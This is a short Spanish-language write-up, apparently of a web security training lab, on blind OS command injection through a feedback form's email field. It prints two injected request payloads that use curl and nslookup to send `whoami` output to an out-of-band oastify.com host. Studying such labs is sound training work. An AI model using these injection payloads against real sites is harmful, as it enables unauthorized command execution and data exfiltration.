Skip to content

Blind OS command injection with out-of-band data exfiltration

[20251009020220.png]

En el sitio web encontraremos un apartado de enviar nuestro feedback.

[20251009020247.png]

Interceptando el trafico observaremos que en el parámetro de email podemos agregar un ; y ejecutar comandos.

[20251009020427.png]

Primer método:

Al tener una ejecución ciega, podemos enviarnos un curl.

c
csrf=OLjvAhI1q9Pf4Sbvqvrx67v5s3fGqR1r&name=test&email=x;curl+http://m9wrlh9o10o2nljr29ztnwbfl6rxft3i.oastify.com/`whoami`;&subject=test&message=test

[20251009020505.png]

Segundo Método

En este caso podremos usar:

c
`whoami`

Por lo que podemos enviar las siguientes solicitudes:

c
csrf=OLjvAhI1q9Pf4Sbvqvrx67v5s3fGqR1r&name=test&email=x;nslookup+`whoami`.m9wrlh9o10o2nljr29ztnwbfl6rxft3i.oastify.com/`whoami`;&subject=test&message=test

Por lo que podemos ver que se puede ejecutar comandos.

[20251009021038.png]